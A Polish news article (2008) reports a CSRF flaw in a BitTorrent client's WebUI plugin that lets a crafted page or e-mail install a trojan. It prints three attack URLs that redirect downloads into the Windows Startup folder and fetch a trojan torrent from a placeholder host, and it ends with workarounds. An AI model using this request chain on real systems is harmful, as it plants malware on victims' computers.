Prawo
Biznes

Nieruchomości Emerytury Podatki
Technologie

Nauka Smartfony i tablety Telewizory - Obraz i dźwięk Testy sprzętu Sztuczna inteligencja
Środowisko

Klimat z bliska Głosem ekspertów - O środowisku i ekologii
Inwestycje

Giełda Waluty Kryptowaluty Surowce
Koronawirus

Koronawirus w Polsce COVID 19 Omikron
Wojna w Ukrainie
Materiały PR
Porady Oszczędzanie pieniędzy
Jak rozliczyć pit 2022 Ulga na internet Abonament RTV 2023 Emeryci i renciści Zwrot podatku Zwrot pieniędzy za dojazd do pracy Ogrzewanie Płaca minimalna 2023 Dnia wolne od pracy 2023 Podatek dochodowy PPK - Pracownicze Plany Kapitałowe
Świadczenia Waloryzacja rent i emerytur 2023
Renta 13 emerytura 14 emerytura Zmiany w 500 plus Świadczenie pielęgnacyjne Bon turystyczny 2023
Kursy walut Kurs euro
Kurs funta Kurs dolara Kurs franka
Kryptowaluty Bitcoin
Etherum Tether BNB
Notowania GPW CD Projekt
JSW KGHM PGE Tarczyński Mabion CCC PZU Lubawa Mercator Medical LW Bogdanka
Kalkulatory Kalkulator netto brutto
Kalkulator stażu pracy Kalkulator odsetek Kalkulator urlopowy Kalkulator średnia ważona
Marki PKP
Instagram LOT YouTube SpaceX Volkswagen ING Xiaomi Samsung InPost
Najbogatsi Jeff Bezos
Elon Musk Bill Gates Mark Zuckerberg Donald Trump Rafał Brzoska Zygmunt Solorz Sytuacja na ukrainie

next
news
Internet
BitTorrent i przejęcie kontroli nad systemem

BitTorrent i przejęcie kontroli nad systemem

pwi 22.04.2008 00:00

Ekspert do spraw bezpieczeństwa informatycznego Billy Rios opisuje usterkę znalezioną przez Roba Cartera w interfejsie WebUI popularnego klienta sieci BitTorrent o nazwie Torrent . Umożliwia ona potencjalnemu napastnikowi przejęcie całkowitej kontroli nad systemem ofiary za pomocą spreparowanej wiadomości e-mailowej lub strony WWW. Jest to możliwe przy użyciu ataku typu Cross-Site Request Forgery (CSRF).

Atak CSRF polega na tym, że witryny zawierające spreparowane odnośniki w postaci kodu JavaScript lub umieszczone w znacznikach uzyskują dostęp do innych stron, a tam, korzystając z danych dostępowych zaatakowanego użytkownika, dokonują na przykład modyfikacji ustawień konfiguracyjnych.

Problem

Do tej pory znane były głównie ataki typu CSRF, których celem była zmiana ustawień konfiguracyjnych routerów tak, aby ich użytkownicy byli przekierowywani do domeny napastnika. Jednak luka znaleziona przez Cartera umożliwia bezpośrednią instalację trojana na komputerze ofiary.

W tym przypadku atak odbywa się w kilku etapach. Pierwszy z linków zmienia ustawienia konfiguracyjne programu Torrent w taki sposób, że ten przenosi udostępniane pliki do innego katalogu:

http://localhost:14774/gui/?action=setsetting&s=dir_completed_download_flag&v=1

Następnie zmienia ścieżkę, pod którą zostają przeniesione udostępniane pliki:

http://localhost:14774/gui/?action=setsetting&s=dir_completed_download& v=?C:\Documents%20and%20Settings\All%20Users\Start%20Menu\Programs\Startup

Powoduje to przeniesienie pobranych plików do folderów Autostart wszystkich użytkowników systemu. Przy użyciu trzeciego odnośnika napastnik może teraz uruchomić procedurę pobierania trojana, który zostanie uruchomiony po restarcie komputera i zalogowaniu się ofiary do systemu:

http://localhost:14774/gui/?action=add-url&s=http://jakis.serwer.domena/trojan. torrent

Rozwiązanie

Nie istnieje jeszcze rozwiązanie problemu.

Obejścia

Skutecznym środkiem chroniącym przed tego rodzaju atakami CSRF może być wprowadzenie żądania podawania hasła przed każdą zmianą ustawień konfiguracyjnych albo używanie identyfikatora sesji - ten nie może być jednak przechowywany w pliku cookie, gdyż wtedy będzie nieprzydatny.

Użytkownicy wtyczki WebUI dla programu Torrent powinni przynajmniej zmienić standardowy port nasłuchu interfejsu WWW. Co więcej, po każdorazowej modyfikacji ustawień należy natychmiast wylogować się z WebUI. Najbezpieczniejszym rozwiązaniem będzie jednak całkowita rezygnacja z używania wspomnianej wtyczki do czasu opublikowania jego poprawionej wersji.

polecamy więcej tematów